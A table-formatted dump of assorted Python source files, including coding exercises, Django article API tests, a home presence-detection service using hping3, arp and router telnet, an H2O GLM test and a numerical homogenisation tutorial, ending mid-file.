text string | size int64 | token_count int64 |
|---|---|---|
# Exercise 1: prompt for the user's name and greet them.
# (Removed the "| 54 | 18 |" extraction residue that broke the syntax.)
name = input('Enter you name :')
print('Hello ', name)
"""
Exercise 2
Write a program to prompt for a file name, and then read through the file and
look for lines of the form:
X-DSPAM-Confidence: 0.8475
When you encounter a line that starts with 'X-DSPAM-Confidence:' pull apart
the line to extract the floating point number on the line. Count these lines
and the compute the total of the spam confidence values from these lines. When
you reach the end of the file, print out the average spam confidence.
Enter the file name: mbox.txt
Average spam confidence: 0.894128046745
Enter the file name: mbox-short.txt
Average spam confidence: 0.750718518519
Test your file on the mbox.txt and mbox-short.txt files.
"""
# Exercise 2: average the X-DSPAM-Confidence values found in a mail file.
file_name = input("Enter a file name: ")
confidence_sum = 0
confidence_count = 0
# Stream the file line by line instead of materialising every line in memory,
# and close the handle deterministically via the context manager.
with open(file_name, "r") as spam_file:
    for line in spam_file:
        # Per the exercise text, only lines that *start* with the header
        # count; the original find() also matched it anywhere in the line.
        if not line.startswith("X-DSPAM-Confidence:"):
            continue
        # the value follows the first space: "X-DSPAM-Confidence: 0.8475"
        confidence = float(line[line.find(" ") + 1:])
        confidence_sum += confidence
        confidence_count += 1
if confidence_count:
    print("Average spam confidence: ", (confidence_sum / confidence_count))
else:
    # avoid ZeroDivisionError when the file has no matching lines
    print("No X-DSPAM-Confidence lines found")
| 1,116 | 356 |
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 21 13:00:28 2021
@author: OTPS
"""
import matplotlib.pyplot as plt
import numpy as np
from scipy.ndimage.filters import gaussian_filter
from PIL import Image
# Overlay the fitted image on top of the base image and display the result.
# (Removed the "| 353 | 153 |" extraction residue that broke the syntax.)
img1 = Image.open(r"fit to merge.png", mode='r')
img2 = Image.open(r"base to merge.png")
# Paste at the top-left corner; passing img2 itself as `mask` uses its own
# alpha channel, so transparent pixels of img2 keep img1 visible underneath.
# NOTE(review): requires img2 to carry an alpha band (RGBA/LA) -- confirm.
img1.paste(img2, (0, 0), mask=img2)
img1.show()
from intake import models
from rest_framework import serializers
from . import fields
class IncomingTransferSerializer(serializers.ModelSerializer):
    """Serialize an ApplicationTransfer as seen from the receiving side.

    Every exposed field except `reason` is computed via SerializerMethodField
    from the transfer's related status update and applications.
    """
    organization_name = serializers.SerializerMethodField()
    author_name = serializers.SerializerMethodField()
    local_date = serializers.SerializerMethodField()
    to_organization_name = serializers.SerializerMethodField()
    class Meta:
        model = models.ApplicationTransfer
        fields = [
            'to_organization_name',
            'organization_name',
            'author_name',
            'local_date',
            'reason'
        ]
    def get_to_organization_name(self, instance):
        # Organization that receives the transferred application.
        return instance.new_application.organization.name
    def get_organization_name(self, instance):
        # Organization the application was transferred away from.
        return instance.status_update.application.organization.name
    def get_author_name(self, instance):
        # Display name of the user who performed the transfer.
        return instance.status_update.author.profile.name
    def get_local_date(self, instance):
        # Render the transfer's creation timestamp through the project's
        # LocalDateField representation.
        return fields.LocalDateField().to_representation(
            instance.status_update.created)
| 1,081 | 277 |
# Read two numbers and k; print the k-th largest common divisor of a and b.
# If fewer than k common divisors exist, the smallest one found (1) is kept.
a, b, k = map(int, input().split())
largest = max(a, b)
found = 0
answer = 0
for candidate in range(largest, 0, -1):
    if a % candidate == 0 and b % candidate == 0:
        found += 1
        answer = candidate
        if found == k:
            break
print(answer)
| 256 | 105 |
from server.handlers.base import ListResource
from server.models import Issue
class IssueListResource(ListResource):
    """List endpoint exposing Issue records under the "issues" key."""
    @property
    def resource(self):
        # Model class this list resource serves.
        return Issue
    @property
    def key(self):
        # JSON key under which the issue collection is returned.
        return "issues"
| 237 | 64 |
"""
None Player Characters
Player Characters are (by default) Objects setup to be puppeted by Players.
They are what you "see" in game. The Character class in this module
is setup to be the "default" character type created by the default
creation commands.
"""
from muddery.server.mappings.element_set import ELEMENT
from muddery.server.statements.statement_handler import STATEMENT_HANDLER
from muddery.server.utils.localized_strings_handler import _
class MudderyWorldNPC(ELEMENT("BASE_NPC")):
    """
    The character not controlled by players.
    """
    element_type = "WORLD_NPC"
    element_name = _("World NPC", "elements")
    model_name = "world_npcs"
    def after_element_setup(self, first_time):
        """
        Init the character.

        Called after the element's data is set up; a non-temporary NPC that
        is dead and has a positive reborn time is revived immediately.
        """
        super(MudderyWorldNPC, self).after_element_setup(first_time)
        if not self.is_temp:
            # if it is dead, reborn at init.
            if not self.is_alive() and self.reborn_time > 0:
                self.reborn()
    def is_visible(self, caller):
        """
        If this object is visible to the caller.

        Args:
            caller: the object whose view is being checked.

        Return:
            boolean: visible
        """
        # No visibility condition configured -> always visible.
        if not self.const.condition:
            return True
        # Otherwise evaluate the configured condition statement for caller.
        return STATEMENT_HANDLER.match_condition(self.const.condition, caller, self)
| 1,305 | 393 |
import json
from .base import BaseTestArticles
from rest_framework.views import status
from ..models import Article
from ...authentication.models import User
from ....apps.profiles.models import Profile
class TestArticles(BaseTestArticles):
    """Integration tests for the articles API.

    Covers CRUD on /api/articles/, tags, reporting / reverting / deleting
    reported articles (superuser flows), and pagination.

    Fixes relative to the original:
    - test_get_all_tags / test_delete_tag passed format='json' to
      str.format() (where it was silently ignored) instead of to the
      test client; the keyword now reaches client.get/client.delete.
    - test_non_existing_article built fake_slug but then used a
      hard-coded URL; the variable is now actually used.
    """

    def data3_user_jwt(self):
        # JWT for a second, non-author user (used for permission tests).
        return User.objects.create_user(**self.data3['user']).token()

    def super_user_jwt(self):
        # JWT for a superuser (used for the /api/reported/ admin flows).
        user = User.objects.create_superuser(**self.data3['user'])
        return user.token()

    def test_create_models_article(self):
        # Article.__str__ must render as the article title.
        user = User.objects.create_user(
            username='henry', email='henry@gmail.com',
            password='Pass12')
        user.is_verified = True
        user = User.objects.filter(email='henry@gmail.com').first()
        author = Profile.objects.get(user_id=user.id)
        article = Article.objects.create(
            title='article title', author=author)
        self.assertEqual(str(article), article.title)

    def create_article(self):
        # Helper: create one article as the logged-in user, return its slug.
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        response = self.client.post(
            '/api/articles/', data=self.article, format='json')
        return response.data['slug']

    def test_create_article(self):
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        response = self.client.post(
            '/api/articles/', data=self.article, format='json')
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

    def test_create_article_long_title(self):
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        response = self.client.post(
            '/api/articles/', data=self.article_log_tile, format='json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_get_article(self):
        slug = self.create_article()
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        response = self.client.get(
            '/api/articles/' + slug, format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_get_article_doesnot_exist(self):
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        fake_slug = "ed" * 23
        response = self.client.get(
            '/api/articles/{}'.format(fake_slug), format='json')
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)

    def test_delete_article(self):
        slug = self.create_article()
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        response = self.client.delete(
            '/api/articles/' + slug + '/', format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_delete_article_doesnot_exist(self):
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        fake_slug = "ed" * 23
        response = self.client.delete(
            '/api/articles/{}/'.format(fake_slug), format='json')
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)

    def test_non_existing_article(self):
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        # BUG FIX: fake_slug was previously built but never used.
        fake_slug = "ed" * 23
        response = self.client.put(
            '/api/articles/{}/'.format(fake_slug),
            data=self.updated_article, format='json')
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)

    def test_update_article(self):
        slug = self.create_article()
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        response = self.client.put(
            '/api/articles/' + slug + '/', data=self.updated_article,
            format='json')
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)

    def test_get_no_existing_published_articles(self):
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        response = self.client.get(
            '/api/articles', format='json')
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)

    def test_get_all_published_articles(self):
        self.create_article()
        self.create_article()
        self.create_article()
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        response = self.client.get(
            '/api/articles', format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_get_all_tags(self):
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        self.client.post(
            '/api/articles/', data=self.article, format='json')
        slug = self.create_article()
        # BUG FIX: format='json' was previously passed to str.format(),
        # where it was ignored, instead of to client.get().
        response = self.client.get(
            '/api/{}/tags/'.format(slug), format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data['tags'], ['Rails', 'Golang', 'magic!'])

    def test_delete_tag(self):
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        self.client.post(
            '/api/articles/', data=self.article, format='json')
        slug = self.create_article()
        # BUG FIX: format='json' now reaches client.delete() (see above).
        response = self.client.delete(
            '/api/{}/tags/magic!/'.format(slug), format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_delete_article_not_author(self):
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        response = self.client.post(
            '/api/articles/', data=self.article, format='json')
        response = json.loads(response.content)
        slug = response['article']['slug']
        # switch to a different (non-author) user before deleting
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.data3_user_jwt())
        res = self.client.delete(
            '/api/articles/{}/'.format(slug))
        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
        self.assertEqual(
            json.loads(res.content)['article']['error'],
            'You can only delete your own articles'
        )

    def test_report_article(self):
        slug = self.create_article()
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        response = self.client.post(
            '/api/articles/{}/report/'.format(slug),
            data=self.report_article_data, format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(
            json.loads(response.content)['reported']['reason'],
            'article contains porn'
        )

    def test_report_article_doesnot_exist(self):
        slug = 'fake-slug'
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        response = self.client.post(
            '/api/articles/{}/report/'.format(slug),
            data=self.report_article_data, format='json')
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
        self.assertEqual(
            json.loads(response.content)['errors'],
            'This article doesnot exist'
        )

    def test_report_article_no_data(self):
        slug = self.create_article()
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        response = self.client.post(
            '/api/articles/{}/report/'.format(slug), data={}, format='json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(
            json.loads(response.content)['errors'],
            'Provide reason for reporting'
        )

    def test_report_article_empty_reason(self):
        slug = self.create_article()
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        response = self.client.post(
            '/api/articles/{}/report/'.format(slug),
            self.report_article_data_empty_reason, format='json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(
            json.loads(response.content)['errors']['reason'],
            ['This field may not be blank.']
        )

    def test_report_article_more_than_5_times(self):
        slug = self.create_article()
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        # the sixth-plus report must be rejected with a conflict
        for article in range(6):
            self.client.post(
                '/api/articles/{}/report/'.format(slug),
                data=self.report_article_data, format='json')
        response = self.client.post(
            '/api/articles/{}/report/'.format(slug),
            data=self.report_article_data, format='json')
        self.assertEqual(response.status_code, status.HTTP_409_CONFLICT)
        self.assertEqual(
            json.loads(response.content)['errors'],
            'This article has been reported more than 5 times'
        )

    def test_fetch_all_reported_articles_non_superuser(self):
        self.create_article()
        self.create_article()
        self.create_article()
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        response = self.client.get('/api/reported/', format='json')
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
        self.assertEqual(
            json.loads(response.content)['reported']['detail'],
            'You do not have permission to perform this action.'
        )

    def test_fetch_all_reported_articles_superuser(self):
        slug1 = self.create_article()
        slug2 = self.create_article()
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.super_user_jwt())
        self.client.post(
            '/api/articles/{}/report/'.format(slug1),
            data=self.report_article_data, format='json')
        self.client.post(
            '/api/articles/{}/report/'.format(slug2),
            data=self.report_article_data, format='json')
        response = self.client.get('/api/reported/', format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertIn(
            slug2,
            json.loads(response.content)[
                'reported']['articles'][0]['article_slug'],
        )

    def test_fetch_all_reported_articles_that_dont_exist(self):
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.super_user_jwt())
        response = self.client.get('/api/reported/', format='json')
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
        self.assertEqual(
            json.loads(response.content)['reported']['articles']['message'],
            'There are no reported articles'
        )

    def test_revert_reported_article(self):
        slug = self.create_article()
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        self.client.post(
            '/api/articles/{}/report/'.format(slug), format='json')
        self.client.post(
            '/api/articles/{}/report/'.format(slug), format='json')
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.super_user_jwt())
        response = self.client.put(
            '/api/reported/{}/revert/'.format(slug), format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(
            response.data['reported']['message'],
            'article restored successully'
        )

    def test_revert_reported_article_doesnot_exist(self):
        slug = 'fake_slug'
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.super_user_jwt())
        response = self.client.put(
            '/api/reported/{}/revert/'.format(slug), format='json')
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)

    def test_delete_reported_article(self):
        slug = self.create_article()
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        self.client.post(
            '/api/articles/{}/report/'.format(slug), format='json')
        self.client.post(
            '/api/articles/{}/report/'.format(slug), format='json')
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.super_user_jwt())
        response = self.client.delete(
            '/api/reported/{}/delete/'.format(slug), format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(
            response.data['reported']['message'],
            'article was deleted successully'
        )

    def test_delete_reported_article_doesnot_exist(self):
        self.create_article()
        slug = 'fakeslug'
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.super_user_jwt())
        response = self.client.delete(
            '/api/reported/{}/delete/'.format(slug), format='json')
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
        self.assertEqual(
            response.data['reported']['error'],
            'This article doesnot exist'
        )

    def test_articles_pagination(self):
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        self.client.post(
            '/api/articles/', data=self.article, format='json')
        self.client.post(
            '/api/articles/', data=self.article, format='json')
        response = self.client.get(
            '/api/articles?page=1&limit=1', format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_page_doesnot_exist(self):
        self.client.credentials(
            HTTP_AUTHORIZATION='Bearer ' + self.login_user())
        response = self.client.get(
            '/api/articles?page=5', format='json')
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
| 14,149 | 4,304 |
'''
@author: davandev
'''
import logging
import os
import urllib
import datetime
from threading import Thread,Event
import davan.config.config_creator as configuration
import davan.http.service.presence.url_helper as url_util
import davan.util.constants as constants
import davan.util.cmd_executor as cmd_executor
import time
import telnetlib
from davan.http.service.presence.phone_status import PhoneStatus
from davan.http.service.base_service import BaseService
'''
Enable telnet in asus router
log into router with user + passwd
run cmd: "/usr/sbin/ip neigh" or /usr/sbin/ip neigh | grep REACHABLE
list shows online devices
'''
class PresenceMgrService(BaseService):
    '''
    Monitor presence of configured phones on the home network.

    Presence is detected two ways: by probing the LAN for each phone's MAC
    address (hping3 + arp), and by the phone actively reporting in through
    handle_request(), which extends a per-user expiry time. When a user's
    combined state flips, the matching home/away URL is fetched to notify
    the automation system. NOTE(review): this module is Python 2 code
    (print statement, urllib.urlopen).
    '''
    def __init__(self, service_provider, config ):
        '''
        Constructor
        '''
        BaseService.__init__(self, constants.PRESENCE_SERVICE_NAME, service_provider, config)
        self.logger = logging.getLogger(os.path.basename(__file__))
        # hping3 UDP probe; element 9 (the empty string) is filled in with
        # the target phone's IP address before each run.
        self.hping_cmd = ['sudo','/usr/sbin/hping3', '-2', '-c', '10', '-p', '5353', '-i' ,'u1','','-q']
        self.devices_cmd =['sudo','/usr/sbin/arp', '-an']#, | awk '{print $4} '"]
        # arp cache delete; element 5 is filled in with the phone's IP.
        self.delete_device_cmd =['sudo','/usr/sbin/arp', '-i' ,'eth0', '-d', '']
        # Phones whose presence is tracked (PhoneStatus holds per-user state).
        self.monitored_devices = []
        # wilma = PhoneStatus("wilma","04:F1:3E:5C:79:75","192.168.2.11", iphone=True)
        # self.monitored_devices.append(wilma)
        david = PhoneStatus("david","7c:91:22:2c:98:c8","192.168.2.39",iphone=False)
        self.monitored_devices.append(david)
        # viggo = PhoneStatus("viggo","40:40:A7:27:2C:98","192.168.2.233",iphone=True)
        # self.monitored_devices.append(viggo)
        mia = PhoneStatus("mia","E8:50:8B:F5:C8:8A","192.168.2.86",iphone=True)
        self.monitored_devices.append(mia)
        # Signals the periodic background loop to stop.
        self.event = Event()
    def handle_request(self, msg):
        '''
        Handle an HTTP presence report.

        `msg` is presumably on the form "<path>?user=<name>" -- the named
        user's reporting expiry is refreshed. Always returns (200, "").
        '''
        msg = msg.split('?')
        res = msg[1].split('=')
        self.monitor_user(res[1])
        return 200, ""
    def stop_service(self):
        # Setting the event wakes (and terminates) the background loop.
        self.logger.debug("Stopping service")
        self.event.set()
    def start_service(self):
        '''
        Start a timer that will pop repeatedly.
        @interval time in seconds between timeouts
        @func callback function at timeout.
        '''
        self.logger.info("Starting re-occuring event")
        def loop():
            # event.wait(300) doubles as the 5-minute interval and the
            # shutdown signal: it returns True once stop_service() sets it.
            while not self.event.wait(300): # the first call is in `interval` secs
                self.increment_invoked()
                self.timeout()
        Thread(target=loop).start()
        return self.event.set
    def monitor_user(self, user_name):
        '''
        Starts monitoring user presence
        @param user, the user to monitor
        '''
        # A report keeps the user "present" for another 7 minutes.
        now = datetime.datetime.now()
        expire_time = now + datetime.timedelta(minutes = 7)
        self.logger.info("Got new user to monitor [" + user_name + "] New expire time:" +str(expire_time))
        for user in self.monitored_devices:
            if user.user == user_name:
                user.expire_time = expire_time
    def check_router_status(self):
        # Manual diagnostic: telnet into the ASUS router and list devices
        # currently REACHABLE on the LAN (see module header for setup).
        self.logger.info("Check router status")
        HOST = "192.168.2.1"
        # user = raw_input("Enter your remote account: ")
        # password = getpass.getpass()
        tn = telnetlib.Telnet(HOST)
        tn.read_until("login: ")
        tn.write("admin\n")
        tn.read_until("Password: ")
        tn.write("\n")
        tn.write("/usr/sbin/ip neigh | grep REACHABLE\n")
        tn.write("exit\n")
        print tn.read_all()
    def timeout(self):
        # Periodic presence check for every monitored phone: combine the
        # WiFi probe with the self-reporting expiry, and on a state flip
        # fetch the user's home/away URL to notify the automation system.
        for user in self.monitored_devices:
            user.status_changed = False
            previous_state = user.phone_status
            self.logger.info("Check presence for user: [ "+ user.user +" ] Previous state [ " + str(previous_state)+ " ]")
            self.is_phone_on_wifi(user)
            self.is_phone_reporting(user)
            if (user.wifi_status or
                user.reporting_status):
                if (not previous_state):
                    # transition away -> home
                    user.phone_status = True
                    user.status_changed = True
                    home_url = url_util.getUserHomeUrl(self.config, user.user)
                    urllib.urlopen(home_url)
            elif (not user.reporting_status and
                  not user.wifi_status):
                if previous_state:
                    # transition home -> away
                    user.phone_status = False
                    user.status_changed = True
                    away_url = url_util.getUserAwayUrl(self.config, user.user)
                    urllib.urlopen(away_url)
            user.toString()
            self.logger.info("-------------------------------------------------")
    def is_phone_on_wifi(self,user):
        # Probe the LAN for the user's phone: hping3 wakes the phone's
        # network stack, then the ARP table is checked for its MAC address.
        self.hping_cmd[9] = user.ip_adress
        cmd_executor.execute_block(self.hping_cmd, "hping", True)
        time.sleep(3)  # give the ARP cache time to pick the device up
        result = cmd_executor.execute_block(self.devices_cmd, "devices", True)
        if user.mac_adress in result:
            if user.wifi_status:
                user.wifi_last_active = str(datetime.datetime.now())
            else:
                user.set_wifi_status(True)
                user.wifi_first_active = str(datetime.datetime.now())
            if user.has_iphone: #Special case for Iphone monitored_devices,
                # presumably because iPhones drop off WiFi when sleeping:
                # extend the reporting expiry a full hour, flush the stale
                # ARP entry and reprobe. TODO(review): confirm intent.
                now = datetime.datetime.now()
                expire_time = now + datetime.timedelta(minutes = 60)
                self.logger.info("User["+user.user+"] has iphone increase expire time to "+ str(expire_time) + " Current time:" + str(now))
                user.expire_time = expire_time
                self.delete_device_cmd[5] = user.ip_adress
                cmd_executor.execute_block(self.delete_device_cmd, "delete_device", True)
                cmd_executor.execute_block(self.hping_cmd, "hping", True)
        else:
            if user.wifi_status:
                user.set_wifi_status(False)
    def is_phone_reporting(self, user):
        '''
        Timeout received, check if any user is now away,
        then inform fibaro system about it.
        '''
        current_time = datetime.datetime.now()
        if user.expire_time > current_time:
            # the phone checked in recently enough; presence still valid
            if user.reporting_status:
                user.reporting_last_active = str(current_time)
            else:
                user.set_reporting_status(True)
                user.reporting_first_active = str(current_time)
        else:
            # expiry passed without a new report -> consider it silent
            if user.reporting_status:
                user.set_reporting_status(False)
# Manual smoke test: run the router diagnostic directly.
if __name__ == '__main__':
    from davan.util import application_logger as log_config
    config = configuration.create()
    log_config.start_logging(config['LOGFILE_PATH'],loglevel=3)
    # BUG FIX: PresenceMgrService.__init__ takes (service_provider, config);
    # the original passed only config, raising a TypeError at startup. No
    # service provider is needed for a one-off router check.
    test = PresenceMgrService(None, config)
    test.check_router_status()
| 7,135 | 2,304 |
from __future__ import print_function
import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.glm import H2OGeneralizedLinearEstimator
def test_glm_plot():
    """Train a binomial GLM and verify plotting behaviour.

    model.plot(metric="objective") must succeed (server=True suppresses
    display), while model.plot(metric="auc") must raise an error.
    Exit code 0 signals success, 1 signals failure.
    """
    training_data = h2o.import_file(pyunit_utils.locate("smalldata/logreg/benign.csv"))
    Y = 3
    X = [0, 1, 2, 4, 5, 6, 7, 8, 9, 10]
    model = H2OGeneralizedLinearEstimator(family="binomial", alpha=0, Lambda=1e-5)
    model.train(x=X, y=Y, training_frame=training_data)
    model.plot(metric="objective", server=True)  # make sure graph will not show.
    try:
        model.plot(metric="auc")
    except Exception:
        sys.exit(0)  # expected: "auc" is not a plottable metric here
    # BUG FIX: the original called sys.exit(1) *inside* the try block and the
    # bare `except:` caught the resulting SystemExit, so the failure path
    # silently turned into sys.exit(0). Exiting outside the handler (and
    # catching only Exception) reports the failure correctly.
    sys.exit(1)  # model.plot(metric="auc") should have raised
# Run under the h2o standalone-test harness when executed directly; when
# imported by the pyunit runner, call the test function immediately.
if __name__ == "__main__":
    pyunit_utils.standalone_test(test_glm_plot)
else:
    test_glm_plot()
| 815 | 314 |
from __future__ import division, print_function
print("""
Numerical homogenisation based on exact integration, which is described in
J. Vondrejc, Improved guaranteed computable bounds on homogenized properties
of periodic media by FourierGalerkin method with exact integration,
Int. J. Numer. Methods Eng., 2016.
This is a self-contained tutorial implementing scalar problem in dim=2 or dim=3
on a unit periodic cell Y=(-0.5,0.5)**dim
with a square (2D) or cube (3D) inclusion of size 0.6 (side).
The material is identity I in matrix phase and 11*I in inclusion phase.
""")
import numpy as np
import itertools
from scipy.sparse.linalg import cg, LinearOperator
dim = 3 # number of spatial dimensions
N = dim*(5,) # number of discretization points
dN = tuple(2*np.array(N)-1) # double grid value
vec_shape=(dim,)+dN  # shape of a vector field: one dim-vector per double-grid point
# indicator function indicating the phase per grid point (square inclusion)
P = dim*(5,) # material resolution in each spatial dimension
phi = np.zeros(P, dtype='float')
if dim==2:
    phi[1:4, 1:4] = 1
elif dim==3:
    phi[1:4, 1:4, 1:4] = 1
# material coefficients at grid points: 11*I inside the inclusion, I in the matrix
C = np.einsum('ij,...->ij...', 11*np.eye(dim), phi)
C += np.einsum('ij,...->ij...', 1*np.eye(dim), 1-phi)
# tensor products / (inverse) Fourier transform / frequencies
dot = lambda A, B: np.einsum('ij...,j...->i...', A, B)
# centred (fftshift-ed) FFT pair, normalised so fft(x)[0-freq] is the mean of x
fft = lambda x, N: np.fft.fftshift(np.fft.fftn(np.fft.ifftshift(x), N))/np.prod(np.array(N))
ifft = lambda x, N: np.fft.fftshift(np.fft.ifftn(np.fft.ifftshift(x), N))*np.prod(np.array(N))
# integer frequencies -fix(N/2)..fix(N/2) for a centred grid of size N
freq_fun = lambda N: np.arange(np.fix(-N/2.), np.fix(N/2.+0.5))
freq = [freq_fun(n) for n in dN]
def get_weights(h): # calculation of integral weights of rectangular function
    """Integral weights of a rectangular (box) function of size `h`.

    The weight at frequency multi-index k is prod(h) * prod_i sinc(h_i*k_i),
    evaluated on the whole double grid `dN`. Vectorised with broadcasting
    instead of the original per-grid-point Python loop; the per-element
    multiplication order (prod(h), then sinc factor 0, 1, ...) is unchanged.
    """
    Wphi = np.full(dN, np.prod(h), dtype='float')  # integral weights
    for ii in range(dim):
        # sinc factor along axis ii, reshaped so it broadcasts over the grid
        shape = np.ones(dim, dtype=int)
        shape[ii] = dN[ii]
        Wphi = Wphi * np.sinc(h[ii]*freq[ii]).reshape(shape)
    return Wphi
def decrease(val, dN): # auxiliary function to remove unnecesary Fourier freq.
    """Crop the trailing spatial axes of `val` to shape `dN`, centred.

    Keeps the central block of Fourier frequencies of a (fftshift-ed) array;
    the two leading axes (tensor components) are kept whole. Supports 2D and
    3D grids; other sizes fall through and return None, as before.
    """
    dN = np.array(dN)
    N = np.array(val.shape[-dN.size:])
    # np.int was removed in NumPy 1.24; the builtin int is the correct dtype
    ibeg = np.array(np.fix((N-dN+(dN % 2))/2), dtype=int)
    iend = np.array(np.fix((N+dN+(dN % 2))/2), dtype=int)
    if dN.size == 2:
        return val[:, :, ibeg[0]:iend[0], ibeg[1]:iend[1]]
    elif dN.size == 3:
        return val[:, :, ibeg[0]:iend[0], ibeg[1]:iend[1], ibeg[2]:iend[2]]
## GRID-BASED COMPOSITE ######### evaluate the matrix of Galerkin approximation
hC0 = np.prod(np.array(P))*fft(C, P)
if P == dN:
    hCex = hC0
elif P > dN:
    hCex = decrease(hC0, dN)
elif P < dN:
    # periodically tile the Fourier coefficients until the double grid dN is
    # covered, then crop back to exactly dN central frequencies
    factor = np.max(np.ceil(np.array(dN) / np.array(P)))
    # np.int was removed in NumPy 1.24; builtin int is the correct dtype
    hCper = np.tile(hC0, int(2*factor-1)*np.ones(dim, dtype=int))
    hCex = decrease(hCper, dN)
# exact material coefficients on the double grid (via integral weights)
Cex = ifft(np.einsum('ij...,...->ij...', hCex, get_weights(1./np.array(P))), dN).real
## INCLUSION-BASED COMPOSITE #### another expression of Cex
Wraw = get_weights(0.6*np.ones(dim))
"""HINT: the size 0.6 corresponds to the size of square inclusion; it is exactly
the size of topology generated by phi, i.e. 3x3 pixels in 5x5 image of PUC with
PUC size 1; then 0.6 = 3./5.
"""
# inverse transform of the box-function weights yields the characteristic
# function of the square inclusion on the double grid
char_square = ifft(Wraw, dN).real
Cex2 = np.einsum('ij...,...->ij...', 11*np.eye(dim), char_square)
Cex2 += np.einsum('ij...,...->ij...', 1*np.eye(dim), 1.-char_square)
## checking that the Cex2 is the same
print('zero check:', np.linalg.norm(Cex-Cex2))
Gamma = np.zeros((dim,dim)+ tuple(dN)) # zero initialize
# assemble the projection (Green) operator in Fourier space:
# Gamma_ij(q) = -q_i*q_j/|q|^2 for q != 0, and zero for the mean frequency
for i,j in itertools.product(range(dim),repeat=2):
    for ind in itertools.product(*[range(int((dN[k]-N[k])/2), int((dN[k]-N[k])/2+N[k])) for k in range(dim)]):
        q = np.array([freq[ii][ind[ii]] for ii in range(dim)]) # frequency vector
        if not q.dot(q) == 0: # zero freq. -> mean
            Gamma[(i,j)+ind] = -(q[i]*q[j])/(q.dot(q))
# - convert to operators
G = lambda X: np.real(ifft(dot(Gamma, fft(X, dN)), dN)).reshape(-1)
A = lambda x: dot(Cex, x.reshape(vec_shape))
GA = lambda x: G(A(x))
# initiate strain/stress (2nd order tensor for each grid point)
# np.float was removed in NumPy 1.24; builtin float is the correct dtype
X = np.zeros(vec_shape, dtype=float)
x = X.reshape(-1)
# macroscopic value
E = np.zeros_like(X); E[0] = 1.
b = -GA(E.reshape(-1))
# iterative solution of the linear system
Alinoper = LinearOperator(shape=(x.size, x.size), matvec=GA, dtype=float)
x, info = cg(A=Alinoper, b=b, x0=X.reshape(-1)) # conjugate gradients
state = x.reshape(vec_shape) + E
flux = dot(Cex, state)
AH_11 = np.sum(flux*state)/np.prod(np.array(dN)) # homogenised properties
print('homogenised coefficient (component 11) =', AH_11)
print('END')
| 4,521 | 1,865 |
import sys
import lxml.etree
from bonobo.constants import NOT_MODIFIED
from bonobo.nodes.io.file import FileReader
from bonobo.config import Configurable, Option, Service
class XMLReader(FileReader):
    '''
